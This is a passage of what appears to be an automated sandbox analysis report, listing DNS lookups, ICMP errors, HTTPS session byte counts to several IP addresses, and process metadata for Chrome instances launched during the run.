Mar 13, 2025 10:48:52.385107040 CET | 53 | 65502 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:48:52.400747061 CET | 53 | 64166 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:48:55.028534889 CET | 61555 | 53 | 192.168.2.5 | 1.1.1.1 |
Mar 13, 2025 10:48:55.028711081 CET | 54415 | 53 | 192.168.2.5 | 1.1.1.1 |
Mar 13, 2025 10:48:55.035907030 CET | 53 | 61555 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:48:55.049118042 CET | 53 | 54415 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:48:57.289433956 CET | 53 | 64022 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:48:57.645020008 CET | 63436 | 53 | 192.168.2.5 | 1.1.1.1 |
Mar 13, 2025 10:48:57.645497084 CET | 57934 | 53 | 192.168.2.5 | 1.1.1.1 |
Mar 13, 2025 10:48:57.647334099 CET | 57732 | 53 | 192.168.2.5 | 1.1.1.1 |
Mar 13, 2025 10:48:57.647654057 CET | 57274 | 53 | 192.168.2.5 | 1.1.1.1 |
Mar 13, 2025 10:48:57.653350115 CET | 53 | 63436 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:48:57.654226065 CET | 53 | 57274 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:48:57.654844046 CET | 53 | 57732 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:48:57.665281057 CET | 53 | 57934 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:49:01.097527027 CET | 61534 | 53 | 192.168.2.5 | 1.1.1.1 |
Mar 13, 2025 10:49:01.097659111 CET | 63989 | 53 | 192.168.2.5 | 1.1.1.1 |
Mar 13, 2025 10:49:01.105456114 CET | 53 | 63989 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:49:01.105595112 CET | 53 | 61534 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:49:04.804639101 CET | 138 | 138 | 192.168.2.5 | 192.168.2.255 |
Mar 13, 2025 10:49:17.692749023 CET | 53 | 50291 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:49:19.681052923 CET | 53 | 57102 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:49:22.205686092 CET | 53 | 52821 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:49:27.912432909 CET | 50079 | 53 | 192.168.2.5 | 1.1.1.1 |
Mar 13, 2025 10:49:27.912587881 CET | 52561 | 53 | 192.168.2.5 | 1.1.1.1 |
Mar 13, 2025 10:49:27.919413090 CET | 53 | 50079 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:49:27.920277119 CET | 53 | 52561 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:49:28.937910080 CET | 57056 | 53 | 192.168.2.5 | 1.1.1.1 |
Mar 13, 2025 10:49:28.938088894 CET | 59916 | 53 | 192.168.2.5 | 1.1.1.1 |
Mar 13, 2025 10:49:28.944916010 CET | 53 | 59916 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:49:28.947158098 CET | 53 | 57056 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:49:30.970844984 CET | 62933 | 53 | 192.168.2.5 | 1.1.1.1 |
Mar 13, 2025 10:49:30.977592945 CET | 53 | 62933 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:49:31.984882116 CET | 62933 | 53 | 192.168.2.5 | 1.1.1.1 |
Mar 13, 2025 10:49:31.991391897 CET | 53 | 62933 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:49:32.984770060 CET | 62933 | 53 | 192.168.2.5 | 1.1.1.1 |
Mar 13, 2025 10:49:32.991405010 CET | 53 | 62933 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:49:34.999639988 CET | 62933 | 53 | 192.168.2.5 | 1.1.1.1 |
Mar 13, 2025 10:49:35.006321907 CET | 53 | 62933 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:49:39.014966011 CET | 62933 | 53 | 192.168.2.5 | 1.1.1.1 |
Mar 13, 2025 10:49:39.021446943 CET | 53 | 62933 | 1.1.1.1 | 192.168.2.5 |
Timestamp | Source IP | Dest IP | Checksum | Code | Type |
---|---|---|---|---|---|
Mar 13, 2025 10:48:25.112202883 CET | 192.168.2.5 | 1.1.1.1 | c1e9 | (Port unreachable) | Destination Unreachable |
Mar 13, 2025 10:48:57.665345907 CET | 192.168.2.5 | 1.1.1.1 | c2a2 | (Port unreachable) | Destination Unreachable |
Mar 13, 2025 10:49:00.632811069 CET | 192.168.2.5 | 1.1.1.1 | c246 | (Port unreachable) | Destination Unreachable |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Mar 13, 2025 10:48:21.907267094 CET | 192.168.2.5 | 1.1.1.1 | 0xcd2a | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 13, 2025 10:48:21.907476902 CET | 192.168.2.5 | 1.1.1.1 | 0x60eb | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 13, 2025 10:48:23.393945932 CET | 192.168.2.5 | 1.1.1.1 | 0x20e | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 13, 2025 10:48:23.394258976 CET | 192.168.2.5 | 1.1.1.1 | 0x5c66 | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 13, 2025 10:48:52.376128912 CET | 192.168.2.5 | 1.1.1.1 | 0xbf78 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 13, 2025 10:48:52.376315117 CET | 192.168.2.5 | 1.1.1.1 | 0x4e89 | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 13, 2025 10:48:55.028534889 CET | 192.168.2.5 | 1.1.1.1 | 0xcbb8 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 13, 2025 10:48:55.028711081 CET | 192.168.2.5 | 1.1.1.1 | 0x43c4 | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 13, 2025 10:48:57.645020008 CET | 192.168.2.5 | 1.1.1.1 | 0x1e32 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 13, 2025 10:48:57.645497084 CET | 192.168.2.5 | 1.1.1.1 | 0x9a8a | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 13, 2025 10:48:57.647334099 CET | 192.168.2.5 | 1.1.1.1 | 0xc79 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 13, 2025 10:48:57.647654057 CET | 192.168.2.5 | 1.1.1.1 | 0xa5d3 | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 13, 2025 10:49:01.097527027 CET | 192.168.2.5 | 1.1.1.1 | 0x89b8 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 13, 2025 10:49:01.097659111 CET | 192.168.2.5 | 1.1.1.1 | 0xca00 | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 13, 2025 10:49:27.912432909 CET | 192.168.2.5 | 1.1.1.1 | 0x1f6 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 13, 2025 10:49:27.912587881 CET | 192.168.2.5 | 1.1.1.1 | 0x7af4 | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 13, 2025 10:49:28.937910080 CET | 192.168.2.5 | 1.1.1.1 | 0xc36f | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 13, 2025 10:49:28.938088894 CET | 192.168.2.5 | 1.1.1.1 | 0x541 | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 13, 2025 10:49:30.970844984 CET | 192.168.2.5 | 1.1.1.1 | 0xb09f | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 13, 2025 10:49:31.984882116 CET | 192.168.2.5 | 1.1.1.1 | 0xb09f | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 13, 2025 10:49:32.984770060 CET | 192.168.2.5 | 1.1.1.1 | 0xb09f | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 13, 2025 10:49:34.999639988 CET | 192.168.2.5 | 1.1.1.1 | 0xb09f | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 13, 2025 10:49:39.014966011 CET | 192.168.2.5 | 1.1.1.1 | 0xb09f | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Mar 13, 2025 10:48:21.913979053 CET | 1.1.1.1 | 192.168.2.5 | 0xcd2a | No error (0) | 142.250.185.100 | A (IP address) | IN (0x0001) | false | ||
Mar 13, 2025 10:48:21.914177895 CET | 1.1.1.1 | 192.168.2.5 | 0x60eb | No error (0) | 65 | IN (0x0001) | false | |||
Mar 13, 2025 10:48:23.489644051 CET | 1.1.1.1 | 192.168.2.5 | 0x20e | No error (0) | 138.197.235.123 | A (IP address) | IN (0x0001) | false | ||
Mar 13, 2025 10:48:25.112082958 CET | 1.1.1.1 | 192.168.2.5 | 0x5c66 | Server failure (2) | none | none | 65 | IN (0x0001) | false | |
Mar 13, 2025 10:48:26.075119019 CET | 1.1.1.1 | 192.168.2.5 | 0x883d | No error (0) | azurefd-t-fb-prod.trafficmanager.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:48:26.075119019 CET | 1.1.1.1 | 192.168.2.5 | 0x883d | No error (0) | dual.s-part-0044.t-0009.fb-t-msedge.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:48:26.075119019 CET | 1.1.1.1 | 192.168.2.5 | 0x883d | No error (0) | global-entry-fb-afdthirdparty-unicast.trafficmanager.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:48:26.075119019 CET | 1.1.1.1 | 192.168.2.5 | 0x883d | No error (0) | stor9a.msedge.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:48:26.075119019 CET | 1.1.1.1 | 192.168.2.5 | 0x883d | No error (0) | 104.212.67.159 | A (IP address) | IN (0x0001) | false | ||
Mar 13, 2025 10:48:29.231563091 CET | 1.1.1.1 | 192.168.2.5 | 0x6b36 | No error (0) | azurefd-t-fb-prod.trafficmanager.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:48:29.231563091 CET | 1.1.1.1 | 192.168.2.5 | 0x6b36 | No error (0) | dual.s-part-0044.t-0009.fb-t-msedge.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:48:29.231563091 CET | 1.1.1.1 | 192.168.2.5 | 0x6b36 | No error (0) | s-part-0044.t-0009.fb-t-msedge.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:48:29.231563091 CET | 1.1.1.1 | 192.168.2.5 | 0x6b36 | No error (0) | 13.107.253.72 | A (IP address) | IN (0x0001) | false | ||
Mar 13, 2025 10:48:52.385107040 CET | 1.1.1.1 | 192.168.2.5 | 0xbf78 | No error (0) | 149.154.167.220 | A (IP address) | IN (0x0001) | false | ||
Mar 13, 2025 10:48:55.035907030 CET | 1.1.1.1 | 192.168.2.5 | 0xcbb8 | No error (0) | 149.154.167.220 | A (IP address) | IN (0x0001) | false | ||
Mar 13, 2025 10:48:57.653350115 CET | 1.1.1.1 | 192.168.2.5 | 0x1e32 | No error (0) | assets.onestore.ms.akadns.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:48:57.653350115 CET | 1.1.1.1 | 192.168.2.5 | 0x1e32 | No error (0) | assets.onestore.ms.edgekey.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:48:57.653350115 CET | 1.1.1.1 | 192.168.2.5 | 0x1e32 | No error (0) | e10583.dspg.akamaiedge.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:48:57.653350115 CET | 1.1.1.1 | 192.168.2.5 | 0x1e32 | No error (0) | 23.192.243.7 | A (IP address) | IN (0x0001) | false | ||
Mar 13, 2025 10:48:57.654226065 CET | 1.1.1.1 | 192.168.2.5 | 0xa5d3 | No error (0) | ajax.aspnetcdn.com.edgesuite.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:48:57.654226065 CET | 1.1.1.1 | 192.168.2.5 | 0xa5d3 | No error (0) | a46.dscr.akamai.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:48:57.654844046 CET | 1.1.1.1 | 192.168.2.5 | 0xc79 | No error (0) | ajax.aspnetcdn.com.edgesuite.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:48:57.654844046 CET | 1.1.1.1 | 192.168.2.5 | 0xc79 | No error (0) | a46.dscr.akamai.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:48:57.654844046 CET | 1.1.1.1 | 192.168.2.5 | 0xc79 | No error (0) | 2.16.202.84 | A (IP address) | IN (0x0001) | false | ||
Mar 13, 2025 10:48:57.654844046 CET | 1.1.1.1 | 192.168.2.5 | 0xc79 | No error (0) | 95.101.54.226 | A (IP address) | IN (0x0001) | false | ||
Mar 13, 2025 10:48:57.665281057 CET | 1.1.1.1 | 192.168.2.5 | 0x9a8a | No error (0) | assets.onestore.ms.akadns.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:48:57.665281057 CET | 1.1.1.1 | 192.168.2.5 | 0x9a8a | No error (0) | assets.onestore.ms.edgekey.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:48:57.665281057 CET | 1.1.1.1 | 192.168.2.5 | 0x9a8a | No error (0) | e10583.dspg.akamaiedge.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:49:00.547492027 CET | 1.1.1.1 | 192.168.2.5 | 0x3ab1 | No error (0) | 152.199.21.175 | A (IP address) | IN (0x0001) | false | ||
Mar 13, 2025 10:49:01.105456114 CET | 1.1.1.1 | 192.168.2.5 | 0xca00 | No error (0) | c-s.cms.ms.akadns.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:49:01.105456114 CET | 1.1.1.1 | 192.168.2.5 | 0xca00 | No error (0) | c.s-microsoft.com-c.edgekey.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:49:01.105456114 CET | 1.1.1.1 | 192.168.2.5 | 0xca00 | No error (0) | e13678.dscg.akamaiedge.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:49:01.105595112 CET | 1.1.1.1 | 192.168.2.5 | 0x89b8 | No error (0) | c-s.cms.ms.akadns.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:49:01.105595112 CET | 1.1.1.1 | 192.168.2.5 | 0x89b8 | No error (0) | c.s-microsoft.com-c.edgekey.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:49:01.105595112 CET | 1.1.1.1 | 192.168.2.5 | 0x89b8 | No error (0) | e13678.dscg.akamaiedge.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:49:01.105595112 CET | 1.1.1.1 | 192.168.2.5 | 0x89b8 | No error (0) | 2.19.106.98 | A (IP address) | IN (0x0001) | false | ||
Mar 13, 2025 10:49:27.919413090 CET | 1.1.1.1 | 192.168.2.5 | 0x1f6 | No error (0) | beacons-handoff.gcp.gvt2.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:49:27.919413090 CET | 1.1.1.1 | 192.168.2.5 | 0x1f6 | No error (0) | 142.250.184.195 | A (IP address) | IN (0x0001) | false | ||
Mar 13, 2025 10:49:27.920277119 CET | 1.1.1.1 | 192.168.2.5 | 0x7af4 | No error (0) | beacons-handoff.gcp.gvt2.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:49:28.944916010 CET | 1.1.1.1 | 192.168.2.5 | 0x541 | No error (0) | beacons-handoff.gcp.gvt2.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:49:28.947158098 CET | 1.1.1.1 | 192.168.2.5 | 0xc36f | No error (0) | beacons-handoff.gcp.gvt2.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:49:28.947158098 CET | 1.1.1.1 | 192.168.2.5 | 0xc36f | No error (0) | 142.250.184.195 | A (IP address) | IN (0x0001) | false | ||
Mar 13, 2025 10:49:30.977592945 CET | 1.1.1.1 | 192.168.2.5 | 0xb09f | No error (0) | beacons-handoff.gcp.gvt2.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:49:30.977592945 CET | 1.1.1.1 | 192.168.2.5 | 0xb09f | No error (0) | 142.250.184.195 | A (IP address) | IN (0x0001) | false | ||
Mar 13, 2025 10:49:31.991391897 CET | 1.1.1.1 | 192.168.2.5 | 0xb09f | No error (0) | beacons-handoff.gcp.gvt2.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:49:31.991391897 CET | 1.1.1.1 | 192.168.2.5 | 0xb09f | No error (0) | 142.250.184.195 | A (IP address) | IN (0x0001) | false | ||
Mar 13, 2025 10:49:32.991405010 CET | 1.1.1.1 | 192.168.2.5 | 0xb09f | No error (0) | beacons-handoff.gcp.gvt2.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:49:32.991405010 CET | 1.1.1.1 | 192.168.2.5 | 0xb09f | No error (0) | 142.250.184.195 | A (IP address) | IN (0x0001) | false | ||
Mar 13, 2025 10:49:35.006321907 CET | 1.1.1.1 | 192.168.2.5 | 0xb09f | No error (0) | beacons-handoff.gcp.gvt2.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:49:35.006321907 CET | 1.1.1.1 | 192.168.2.5 | 0xb09f | No error (0) | 142.250.184.195 | A (IP address) | IN (0x0001) | false | ||
Mar 13, 2025 10:49:39.021446943 CET | 1.1.1.1 | 192.168.2.5 | 0xb09f | No error (0) | beacons-handoff.gcp.gvt2.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 13, 2025 10:49:39.021446943 CET | 1.1.1.1 | 192.168.2.5 | 0xb09f | No error (0) | 142.250.184.195 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.5 | 49723 | 138.197.235.123 | 443 | 6688 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-13 09:48:25 UTC | 682 | OUT | |
2025-03-13 09:48:26 UTC | 441 | IN | |
2025-03-13 09:48:26 UTC | 7989 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.5 | 49722 | 142.250.185.100 | 443 | 6688 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-13 09:48:25 UTC | 575 | OUT |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.5 | 49724 | 138.197.235.123 | 443 | 6688 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-13 09:48:30 UTC | 613 | OUT | |
2025-03-13 09:48:30 UTC | 256 | IN | |
2025-03-13 09:48:30 UTC | 8247 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.5 | 49737 | 149.154.167.220 | 443 | 6688 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-13 09:48:54 UTC | 788 | OUT | |
2025-03-13 09:48:54 UTC | 388 | IN | |
2025-03-13 09:48:54 UTC | 406 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.5 | 49740 | 149.154.167.220 | 443 | 6688 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-13 09:48:56 UTC | 611 | OUT | |
2025-03-13 09:48:57 UTC | 388 | IN | |
2025-03-13 09:48:57 UTC | 406 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.5 | 49742 | 2.16.202.84 | 443 | 6688 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-13 09:48:59 UTC | 591 | OUT | |
2025-03-13 09:49:00 UTC | 451 | IN | |
2025-03-13 09:49:00 UTC | 15933 | IN | |
2025-03-13 09:49:00 UTC | 15905 | IN | |
2025-03-13 09:49:00 UTC | 14567 | IN | |
2025-03-13 09:49:00 UTC | 16384 | IN | |
2025-03-13 09:49:00 UTC | 16384 | IN | |
2025-03-13 09:49:00 UTC | 10 | IN | |
2025-03-13 09:49:00 UTC | 2 | IN | |
2025-03-13 09:49:00 UTC | 13299 | IN | |
2025-03-13 09:49:00 UTC | 193 | IN | |
2025-03-13 09:49:00 UTC | 12 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.5 | 49743 | 23.192.243.7 | 443 | 6688 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-13 09:48:59 UTC | 649 | OUT | |
2025-03-13 09:49:00 UTC | 864 | IN | |
2025-03-13 09:49:00 UTC | 15520 | IN | |
2025-03-13 09:49:00 UTC | 9068 | IN | |
2025-03-13 09:49:00 UTC | 16384 | IN | |
2025-03-13 09:49:00 UTC | 8204 | IN | |
2025-03-13 09:49:00 UTC | 16384 | IN | |
2025-03-13 09:49:00 UTC | 12 | IN | |
2025-03-13 09:49:00 UTC | 16384 | IN | |
2025-03-13 09:49:00 UTC | 12 | IN | |
2025-03-13 09:49:00 UTC | 16384 | IN | |
2025-03-13 09:49:00 UTC | 8204 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.5 | 49747 | 2.19.106.98 | 443 | 6688 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-13 09:49:03 UTC | 625 | OUT | |
2025-03-13 09:49:03 UTC | 683 | IN | |
2025-03-13 09:49:03 UTC | 513 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
8 | 192.168.2.5 | 49748 | 23.192.243.7 | 443 | 6688 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-13 09:49:03 UTC | 687 | OUT | |
2025-03-13 09:49:03 UTC | 667 | IN | |
2025-03-13 09:49:03 UTC | 15717 | IN | |
2025-03-13 09:49:03 UTC | 4323 | IN |
Click to jump to process
Click to jump to process
Click to jump to process
Target ID: | 1 |
Start time: | 05:48:09 |
Start date: | 13/03/2025 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff60fae0000 |
File size: | 3'388'000 bytes |
MD5 hash: | E81F54E6C1129887AEA47E7D092680BF |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | false |
Target ID: | 2 |
Start time: | 05:48:15 |
Start date: | 13/03/2025 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff60fae0000 |
File size: | 3'388'000 bytes |
MD5 hash: | E81F54E6C1129887AEA47E7D092680BF |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | false |
Target ID: | 3 |
Start time: | 05:48:17 |
Start date: | 13/03/2025 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff60fae0000 |
File size: | 3'388'000 bytes |
MD5 hash: | E81F54E6C1129887AEA47E7D092680BF |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | false |
Target ID: | 6 |
Start time: | 05:48:22 |
Start date: | 13/03/2025 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff60fae0000 |
File size: | 3'388'000 bytes |
MD5 hash: | E81F54E6C1129887AEA47E7D092680BF |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |